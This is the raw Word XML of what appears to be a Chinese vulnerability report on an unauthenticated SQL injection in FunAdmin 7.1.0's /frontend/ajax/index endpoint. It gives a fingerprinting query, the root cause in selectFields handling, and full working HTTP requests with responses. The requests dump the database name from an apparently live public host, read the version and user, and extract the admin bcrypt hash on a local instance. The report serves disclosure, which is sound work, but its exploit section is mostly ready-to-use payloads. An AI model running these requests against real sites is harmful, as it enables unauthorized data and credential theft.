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5786"/>
      </w:tblGrid>
      <w:tr w14:paraId="5C1563DA">
        <w:trPr>
          <w:trHeight w:val="310" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="62A8E7F5">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto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漏洞厂商</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3395" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="48292CC2">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>苏州泛爱软件科技有限公司</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="036958BF">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="0000FF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厂商官网：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000311"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:fill="F8F8F8"/>
              </w:rPr>
              <w:t>http://fanhantech.com/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="64A5D4E6">
        <w:trPr>
          <w:trHeight w:val="310" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3BA48866">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto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影响产品及版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3395" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5403CA46">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="微软雅黑" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0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ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>FunAdmin 7.1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="20C084E7">
        <w:trPr>
          <w:trHeight w:val="1090" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="48E5613B">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto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影响对象类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3395" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="66309ACA">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="0000FF"/>
                <w:kern w:val="0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Web</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="23257ABA">
        <w:trPr>
          <w:trHeight w:val="310" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="14B74E9D">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto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是否产品组件漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3395" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1C239013">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both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</w:tr>
    </w:tbl>
    <w:p w14:paraId="6D7177CC"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="3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7913"/>
      </w:tblGrid>
      <w:tr w14:paraId="112C9C42">
        <w:trPr>
          <w:trHeight w:val="310" w:hRule="atLeast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C45CC54">
            <w:pPr>
              <w:widowControl/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漏洞详情</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="164B4CF6">
        <w:trPr>
          <w:trHeight w:val="1360" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F793663">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto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漏洞类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3395" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1EA95AFF">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="0000FF"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b/>
                <w:sz w:val="36"/>
              </w:rPr>
              <w:t>SQL 注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7F660CFE">
        <w:trPr>
          <w:trHeight w:val="810" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2DD7FEE0">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto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漏洞URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3395" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6CF518B7">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="0000FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pP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https://199.102.216.176</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="20FFADE0">
        <w:trPr>
          <w:trHeight w:val="1900" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="738CBDCF">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto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漏洞描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3395" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="407D521D">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="0000FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b/>
                <w:sz w:val="36"/>
              </w:rPr>
              <w:t>SQL 注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0A4A13B6">
        <w:trPr>
          <w:trHeight w:val="1110" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A74AA90">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto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/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>漏洞验证过程</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3395" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3DE6144C">
            <w:pPr>
              <w:spacing w:before="240" w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>互联网资产证明</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1543101F">
            <w:pPr>
              <w:spacing w:before="160" w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b/>
                <w:sz w:val="25"/>
              </w:rPr>
              <w:t>1）精准测绘语法</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77CA6710">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
              <w:spacing w:before="6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body="funadmin"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="780ADC42">
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="25D869BF">
            <w:pPr>
              <w:spacing w:before="160" w:after="100"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b/>
                <w:sz w:val="25"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="25"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b/>
                <w:sz w:val="25"/>
              </w:rPr>
              <w:t>）测绘平台截图</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ACDB961">
            <w:pPr>
              <w:spacing w:before="160" w:after="100"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b/>
                <w:sz w:val="25"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="5474970" cy="3115945"/>
                  <wp:effectExtent l="0" t="0" r="11430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3115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6C53F8">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:color="BBBBBB" w:sz="6" w:space="1"/>
              </w:pBdr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0A27A53E">
            <w:pPr>
              <w:spacing w:before="240" w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>1、漏洞技术细节</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F0D842A">
            <w:pPr>
              <w:spacing w:before="160" w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b/>
                <w:sz w:val="25"/>
              </w:rPr>
              <w:t>1）完整PoC描述</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41E2C7BE">
            <w:pPr>
              <w:spacing w:after="100" w:line="300" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">前台列表接口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/frontend/ajax/index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由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app/frontend/controller/Frontend.php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提供，其继承的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Curd::index()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在请求带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X-Requested-With: XMLHttpRequest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且存在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selectFields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参数时调用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selectList()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，随后把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selectFields[name].','.selectFields[value]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原样交给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field()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；因字符串含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(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触发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fieldRaw()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>，注入的标量表达式被作为 SELECT 列求值并回显在 JSON 响应中。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="685E6334">
            <w:pPr>
              <w:spacing w:after="100" w:line="300" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>完整请求报文：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="755F407B">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
              <w:spacing w:before="6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GET /frontend/ajax/index?selectFields%5Bname%5D=%28select%20database%28%29%29&amp;selectFields%5Bvalue%5D=id HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CFC492A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Host: 199.102.216.176</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7860259E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User-Agent: Mozilla/5.0 (compatible; NCC-research/1.0; authorized security testing)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="058F2603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Accept: */*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06995DB9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X-Requested-With: XMLHttpRequest</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="238F6F93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Connection: close</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27F6271A">
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="27B8D0EE">
            <w:pPr>
              <w:spacing w:after="100" w:line="300" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>响应报文：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D52EA2B">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
              <w:spacing w:before="6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HTTP/1.1 200 OK</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48325B35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Content-Type: application/json; charset=utf-8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="193559A0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Connection: close</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B05034F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 xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BE032E2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{"code":1,"msg":"","data":[{"(select database())":"154_12_58_103","id":1},{"(select database())":"154_12_58_103","id":2}],"url":"","wait":3}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A49F880">
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4B2E9D66">
            <w:pPr>
              <w:spacing w:after="100" w:line="300" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">响应中的关键证据：JSON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data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数组的键为注入表达式本身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(select database())</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>，其值为目标站点</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>真实数据库名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154_12_58_103</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>，证明攻击者构造的 SQL 表达式已在服务端被数据库执行并把结果回显。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E81D402">
            <w:pPr>
              <w:spacing w:after="100" w:line="300" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">同一报文替换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selectFields[name]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即可读取其它数据（枚举示例，实测于本地靶场）：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54BCADBA">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
              <w:spacing w:before="6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GET /frontend/ajax/index?selectFields%5Bname%5D=concat%28version%28%29%2C0x7c%2Ccurrent_user%28%29%29&amp;selectFields%5Bvalue%5D=id HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F0239D1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Host: 127.0.0.1:8097</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BEC81A6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X-Requested-With: XMLHttpRequest</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6969DF53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 xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2ACB1632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HTTP/1.1 200 OK</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D340B15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{"code":1,"msg":"","data":[{"concat(version(),0x7c,current_user())":"10.4.32-MariaDB|root@localhost","id":1}],"url":"","wait":3}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0225918C">
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1BDD39CB">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
              <w:spacing w:before="6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GET /frontend/ajax/index?selectFields%5Bname%5D=%28select%20concat%28username%2C0x3a%2Cpassword%29%20from%20fun_admin%20limit%201%29&amp;selectFields%5Bvalue%5D=id HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="141F4A35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Host: 127.0.0.1:8097</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1259BE1C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X-Requested-With: XMLHttpRequest</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66D53F1C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 xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="292BF376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HTTP/1.1 200 OK</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ECD7EC1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{"code":1,"msg":"","data":[{"(select concat(username,0x3a,password) from fun_admin limit 1)":"admin:$2y$10$IYTN5uMdfMhTOHJkkmc22.geLEZk03pTfzBrWpD5f5AMObnaBUJ8O","id":1}],"url":"","wait":3}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52A1833B">
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="286AC977">
            <w:pPr>
              <w:spacing w:after="100" w:line="300" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>注入参数解码后的原文：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14B58992">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
              <w:spacing w:before="6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selectFields[name]=(select database())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2059769F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selectFields[value]=id</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="747BF10B">
            <w:pPr>
              <w:spacing w:after="100" w:line="300" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="14D4F8CD">
            <w:pPr>
              <w:spacing w:before="160" w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b/>
                <w:sz w:val="25"/>
              </w:rPr>
              <w:t>2）触发条件</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1429ECAA">
            <w:pPr>
              <w:spacing w:after="100" w:line="300" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">无需登录权限。仅需满足两点：① 目标站点部署 FunAdmin 且前台应用可访问；② 请求携带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X-Requested-With: XMLHttpRequest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头并传入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selectFields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参数（前台列表接口的正常调用方式即满足）。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="126D06BC">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:color="BBBBBB" w:sz="6" w:space="1"/>
              </w:pBdr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="789E6D3F">
            <w:pPr>
              <w:spacing w:before="240" w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>2、复现证明</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B53E421">
            <w:pPr>
              <w:spacing w:before="160" w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b/>
                <w:sz w:val="25"/>
              </w:rPr>
              <w:t>本地复现案例</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F028E02">
            <w:pPr>
              <w:spacing w:after="100" w:line="300" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>1）基础环境搭建</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B433B23">
            <w:pPr>
              <w:spacing w:after="100" w:line="300" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">以官方仓库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https://github.com/funadmin/funadmin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最新源码（7.1.0）在本地隔离环境部署（PHP 8.3.33 + MariaDB 10.4.32 + 内置 Web 服务器），执行官方安装向导完成初始化，站点根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http://127.0.0.1:8097</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FF4DC6D">
            <w:pPr>
              <w:spacing w:after="100" w:line="300" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>2）漏洞触发操作</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DA269FF">
            <w:pPr>
              <w:spacing w:after="100" w:line="300" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">匿名请求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GET /frontend/ajax/index?selectFields[name]=(select database())&amp;selectFields[value]=id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（头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X-Requested-With: XMLHttpRequest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），观测到响应 JSON 中回显数据库名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funadmin_repro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；把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selectFields[name]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换为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sleep(3)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时响应耗时由基线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0.089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秒变为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6.13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秒，确认注入表达式在数据库侧求值。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38978FF4">
            <w:pPr>
              <w:spacing w:after="100" w:line="300" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑"/>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>3）危害达成观测</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F59BCAE">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
              <w:spacing w:before="6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GET /frontend/ajax/index?selectFields%5Bname%5D=%28select%20concat%28username%2C0x3a%2Cpassword%29%20from%20fun_admin%20limit%201%29&amp;selectFields%5Bvalue%5D=id HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69FECB87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Host: 127.0.0.1:8097</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D9A27AD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X-Requested-With: XMLHttpRequest</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C199058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Connection: close</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="021F8CC2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 xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="355BDA7B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HTTP/1.1 200 OK</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="405D966E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Content-Type: application/json; charset=utf-8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B807E93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 xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EA9EA53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{"code":1,"msg":"","data":[{"(select concat(username,0x3a,password) from fun_admin limit 1)":"admin:$2y$10$IYTN5uMdfMhTOHJkkmc22.geLEZk03pTfzBrWpD5f5AMObnaBUJ8O","id":1}],"url":"","wait":3}</w:t>
